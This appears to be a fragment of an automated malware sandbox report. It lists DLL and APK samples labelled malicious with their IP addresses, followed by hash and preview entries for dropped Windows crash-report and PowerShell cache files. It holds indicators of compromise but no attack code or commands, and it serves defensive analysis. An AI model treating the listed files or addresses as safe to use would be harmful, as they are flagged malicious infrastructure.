AS-SOFTPLUSCH | 2oCOO5LbPu.dll | malicious | 185.189.151.28
AS-SOFTPLUSCH | rXN8OIpbzz.dll | malicious | 185.189.151.28
AS-SOFTPLUSCH | GlJdt15gDI.dll | malicious | 185.189.151.28
AS-SOFTPLUSCH | o52M6ZqBFp | malicious | 176.10.116.173
AS-SOFTPLUSCH | com.abbondioendrizzi.tools.supercleaner-9-apkplz.net.apk | malicious | 176.10.119.156
AS-SOFTPLUSCH | com.pagnotto28.sellsourcecode.supercleaner-9-apkplz.net.apk | malicious | 176.10.119.156

JA3 Fingerprints
No context

Dropped Files
No context
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.7414878379061339
                        Encrypted:false
                        SSDEEP:96:29L4VnYyey9hasCj+ASZpXIQcQac6pcEccw35+a+z+HbHghownOgtYsXqOEX/vFW:sqn1H0tGtjCq/u7sDS274Itb
                        MD5:3122AD34CF8329BB6EBD0E8D111E4087
                        SHA1:999CAA75892DB4C0844D7B460220CB9B21C1EA19
                        SHA-256:F71BA276707F0E7720708EB5D9CC9D6EC23AC2252083F5BB6A29CE5794C1DC78
                        SHA-512:9B75B1C2B4EC3D11BEB712870BE21D840884544275942D3D64DAE23CB9F1534924923A972A69557F09B2BC21D48645D6C03CAFB8ECE21034229CD3C88FF0EE21
                        Malicious:false
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.9.4.4.3.9.7.2.9.8.1.1.4.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.0.3.0.0.8.5.-.2.7.7.f.-.4.d.7.e.-.b.b.4.4.-.d.4.f.d.5.c.d.e.b.e.2.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.4.6.e.7.3.6.f.-.f.0.e.c.-.4.d.4.1.-.9.2.7.6.-.6.7.4.c.4.f.7.3.7.6.2.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.8.0.-.0.0.0.1.-.0.0.1.c.-.a.1.8.c.-.f.b.8.5.1.9.7.0.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.2././.1.3.:.0.9.:.0.7.:.1.6.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.7447297265547901
                        Encrypted:false
                        SSDEEP:96:gZFhVnYy9y9hasCjmfspXIQcQJc6VccEBFcw3Brq+a+z+HbHghownOgtYsXqOEXY:URnZHnJcphwjCq/u7sDS274ItW
                        MD5:612790C6049DF86989352C75FF80C799
                        SHA1:51B73A9F377C7703629EF594D7CC822C6239704B
                        SHA-256:C60E7DF72E6F2DD6CFD266A9FFF1F6F235201D378811529C6901FDEE6348B85B
                        SHA-512:8D45A9C7256636A634982AC9DEA5D9DC6BF58E4F24DA8824616BEAB97CCAF7EC15A3BDCFBAC8E814DC2A323F7452C5B4B47069CA1B942410F3B161E0B42DDB7F
                        Malicious:false
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.9.4.4.4.0.9.2.3.6.2.5.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.7.9.4.4.4.1.2.3.9.2.5.0.0.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.7.a.5.5.3.7.4.-.e.a.7.5.-.4.6.f.f.-.b.6.8.0.-.a.d.b.c.9.1.b.d.d.b.3.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.4.1.8.7.f.c.5.-.3.2.a.d.-.4.3.2.5.-.b.5.4.f.-.8.a.8.5.f.1.c.1.a.d.2.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.8.0.-.0.0.0.1.-.0.0.1.c.-.a.1.8.c.-.f.b.8.5.1.9.7.0.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.7488102922693348
                        Encrypted:false
                        SSDEEP:96:EtFlgVnYyDy9haot7Jn4pXIQcQac6pcEccw35+a+z+HbHghownOgtYsXqOEX/vF9:8WnlH0tGtjCq/u7sDS274ItW
                        MD5:18E4E82637478C9977F4CC69CE04C054
                        SHA1:8F47765B89680E02345DBFCD7D646ECD232BE62F
                        SHA-256:62F8AC43AF175660855F62EEBBD281264AD13653A75653048C5A9F6F2D00DE4D
                        SHA-512:E13E01D9F600F1866C61D5278FFE22FCEC540CAE891EEF19F4F13E87B83C92EBA5C28B2FE332806842CD175F6E82B55BC7DCCA8DBC3A1FBCF187A356A3DD0BCE
                        Malicious:false
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.9.4.4.4.0.1.7.5.5.2.7.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.7.9.4.4.4.0.3.4.1.1.4.9.8.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.8.c.b.9.8.1.-.c.2.0.e.-.4.5.0.9.-.8.7.8.a.-.c.c.c.0.0.b.2.7.c.9.e.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.3.9.d.3.d.3.b.-.7.f.e.9.-.4.0.d.1.-.9.0.3.3.-.d.4.7.1.7.9.d.8.7.3.7.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.8.0.-.0.0.0.1.-.0.0.1.c.-.a.1.8.c.-.f.b.8.5.1.9.7.0.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 15 streams, Wed May 25 09:26:37 2022, 0x1205a4 type
                        Category:dropped
                        Size (bytes):34890
                        Entropy (8bit):2.0871699584549472
                        Encrypted:false
                        SSDEEP:96:5h8oF8NGYG/9CHM1hgnoi710/DQ1rIa2gJzF32OKvnZheGWIRWIXAI4EnJBwga1H:ULG/51hgoO1Brp24GOYziEJBwgaTyw9
                        MD5:F0C9AFEE351CEECD0EE114CFBF699D21
                        SHA1:7F8074F0115265A26B9C377AFC6E15DD905C88AC
                        SHA-256:18C525091F3CF41C96831ED38A66FE7E8772F467E446666E78B449927BA2CFDF
                        SHA-512:EE087C5146560C1EA08C620826DAA464747873278731EBDFC65327FF11479397CAD5F91C00B90E7B47F2FE13F3CFB592FC53DA6879D52CFF42B39C6B737109AF
                        Malicious:false
                        Preview:MDMP....... .......M..b........................L...........$...............~!..........`.......8...........T...........(..."x...........................................................................................U...........B..............GenuineIntelW...........T...........I..b.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8346
                        Entropy (8bit):3.692217837765199
                        Encrypted:false
                        SSDEEP:192:Rrl7r3GLNi+n6bfZm6Y4TSUtsgmfISG+pN389bEB1f5MMm:RrlsNie6Fm6YMSUtsgmfISkEDfc
                        MD5:789351A69FF01E029E9232B20548C291
                        SHA1:1B5B4A91729BE69471015008A1DAD5827E72F1AD
                        SHA-256:28D990D18B807EB7743AE19CBB32EBAED164A4711E0B9C699E9630AA75DF1147
                        SHA-512:B0BCAE5A4ACF5B2E96390251D45E8D1FCD7E66CA6F7616356BFD2AD9D7908C1810E6ACEAAC8965E11597CA89001A1FE90AC7236BA73A0B8653B62680591F3F13
                        Malicious:false
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.5.6.<./.P.i.d.>.......
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4659
                        Entropy (8bit):4.4259860118465895
                        Encrypted:false
                        SSDEEP:48:cvIwSD8zsRGJgtWI9qkWgc8sqYjR8fm8M4J2+nFJ+q8vQ+GdKcQIcQw0cd:uITfRcR9grsqYqJZKadKkw0cd
                        MD5:76F9EB4132E4B59649BB0CD22F905041
                        SHA1:D80A6535CECCEDEFF04EDD4D83E9EDCCE2B7A9FE
                        SHA-256:22B8C3BC47CFDCC2DF8D5C12A9B9B45302C87A01AC9AB4734F5DCFC4FDC06883
                        SHA-512:0D2986DDC0B5D6AD3CADDEA6AA3600F864EC6069AC3E2A7D1EDC4C13354F75F367F83444984F6B3AD7C3F4CB811785322DC6D6090F34386E3D31251110359982
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1530397" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 15 streams, Wed May 25 09:26:42 2022, 0x1205a4 type
                        Category:dropped
                        Size (bytes):34690
                        Entropy (8bit):2.0271582616456114
                        Encrypted:false
                        SSDEEP:192:jap/V6OOdO1SqQ8OYziEi41/fCltDOs+c7qy:cBOQ1GYLi4xC5
                        MD5:98823C3E4F054A9165D438EC4E2CEB1C
                        SHA1:051919123D1748F229F193164FECCE69812CA866
                        SHA-256:DB59C27D1626DA7874EE219BADAAA298206B57DADFFE33BE9C8450D3D7484335
                        SHA-512:39DD7AFE4D239B7FD65B96799E7AB437B2FF8A46C49830F3F859E86723BF8F01780F6F1680971EF005B170CC978A639896D9C513E68CD33F1684E784EDFF1F56
                        Malicious:false
                        Preview:MDMP....... .......R..b........................L...........$...............~!..........`.......8...........T...........(...Zw...........................................................................................U...........B..............GenuineIntelW...........T...........I..b.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8334
                        Entropy (8bit):3.700853069434835
                        Encrypted:false
                        SSDEEP:192:Rrl7r3GLNi+q6bfEM6Y4CSU7jmjTgmfJSG+prO89bZhsfhzm:RrlsNiD6YM6YNSUXmjTgmfJSNZafY
                        MD5:F17272FA1DC6E944333E729B686AC8BF
                        SHA1:A2E3FB6A6488B24F8FD3F70D3BA0F38E339527C7
                        SHA-256:8B35122280A22F36A355172B77CC9E0FBF6E4E3C9A74396850043B7F7E3675CF
                        SHA-512:CF1E6CB0A4EEEEE9655DD01122F966E4C65B5A32606D0DBB147BC4BAC8A6C7AC3E3606082770B631D46D2D95144271A0C4F99CBEC577C15C03AA41E223985B9D
                        Malicious:false
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.5.6.<./.P.i.d.>.......
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4598
                        Entropy (8bit):4.469500510780283
                        Encrypted:false
                        SSDEEP:48:cvIwSD8zsRGJgtWI9qkWgc8sqYjq8fm8M4J2+EZFV+q849hYdKcQIcQw09d:uITfRcR9grsqYzJKprYdKkw09d
                        MD5:FBDC6EC9B2BD979AFA8A53D339B3D0B0
                        SHA1:E7F7A92AC9B2945B91CF2487BCA9463015E0E39B
                        SHA-256:908D3289EBFABE37133537239D2AA37249ABD4950E0C01B6B698FB11E3240B2C
                        SHA-512:454FEAE4EC651A1358A949D0CCCD895265ECA8B654B9D11D7E3EC00DFD082F1A6AD0A206FB22B217FF6489A1F4B5AC5A8D630FBF50F27D6CF48C728C9F12A4B6
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1530397" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 15 streams, Wed May 25 09:26:51 2022, 0x1205a4 type
                        Category:dropped
                        Size (bytes):47714
                        Entropy (8bit):2.2902635791349857
                        Encrypted:false
                        SSDEEP:192:Oqz/TzQWQpBO1wwzp2PiWpUrBGyL3TVgKFdzhRygvugloYxOOYzUEqqCGNmDN8Qo:ndL1Rpw+rgyfSeZhDvsYx5Y5qqxV
                        MD5:0FC4337E7B15D8ABB2CD6C659E08B905
                        SHA1:7CE7EB1E2790D30232654AB47D5453CE97A0F618
                        SHA-256:084CA58989DD4CF4FFB474DBD33375FD916E5F9C66028AD515776FD792EB7A15
                        SHA-512:1C07F7850F69149ABCA03F0DA7FE500FA65DE4FDAC77CA04DC0DA08DB121B6A1FE598211EC0BDB878257D70FB79233E9BFB3EBD87C647A830FF55D9648D0A5B0
                        Malicious:false
                        Preview:MDMP....... .......[..b........................L...........$...............~!..........`.......8...........T...............b............................................................................................U...........B..............GenuineIntelW...........T...........I..b.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8290
                        Entropy (8bit):3.693325525971125
                        Encrypted:false
                        SSDEEP:192:Rrl7r3GLNi+L6b+c6Y4iSUJZmgmfDSitl+pDr89bjhsf2hm:RrlsNi66Cc6YNSUJogmfDSsjafh
                        MD5:F26E02402044828537B8F1E48C9AED33
                        SHA1:9A3F38DA9BBC6B8CC52AACBA76BB035B5C429FC6
                        SHA-256:8BB6A39C1780F107AF1BD5AE064536CC39C55B189CDFE9E468EB513FF8A3C511
                        SHA-512:86398A402390F4896C623A77DF832580C843C351FC1A6488F912B4AAE9CEC66B7C020CD5CF0A6145F22B15C51D26C3573F5A2CFC718AC46D14F4EFE539EBC6CF
                        Malicious:false
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.5.6.<./.P.i.d.>.......
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4558
                        Entropy (8bit):4.435949177836784
                        Encrypted:false
                        SSDEEP:48:cvIwSD8zsRGJgtWI9qkWgc8sqYjC8fm8M4J2+wFoml+q84BydKcQIcQw09d:uITfRcR9grsqYrJGlodKkw09d
                        MD5:7F80AD412C3577DDB6529872079E5DC2
                        SHA1:6A49967DC7C2A9F9A006CFCB0B8B0841CEBA3C20
                        SHA-256:70D44B739211FE25940AA6074488F57E481D0EDC6151ECE1FAEB6BF4AC576349
                        SHA-512:B910A709F8DE77ADFF935F931A15DE448CDA1FE689D61F8CC6E172E3CB4370288996ABAA8B095B045DD88AB137B6A74D3EDCF14450F5CEDCDEE9B53A0AB8E548
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1530397" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):11606
                        Entropy (8bit):4.8910535897909355
                        Encrypted:false
                        SSDEEP:192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ
                        MD5:F84F6C99316F038F964F3A6DB900038F
                        SHA1:C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1
                        SHA-256:F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E
                        SHA-512:E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31
                        Malicious:false
                        Preview:PSMODULECACHE.....7B\.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope................a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........3......[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1192
                        Entropy (8bit):5.325275554903011
                        Encrypted:false
                        SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5
                        MD5:05CF074042A017A42C1877FC5DB819AB
                        SHA1:5AF2016605B06ECE0BFB3916A9480D6042355188
                        SHA-256:971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
                        SHA-512:96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A
                        Malicious:false
                        Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text
                        Category:dropped
                        Size (bytes):392
                        Entropy (8bit):4.988829579018284
                        Encrypted:false
                        SSDEEP:6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy
                        MD5:80545CB568082AB66554E902D9291782
                        SHA1:D013E59DC494D017F0E790D63CEB397583DCB36B
                        SHA-256:E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C
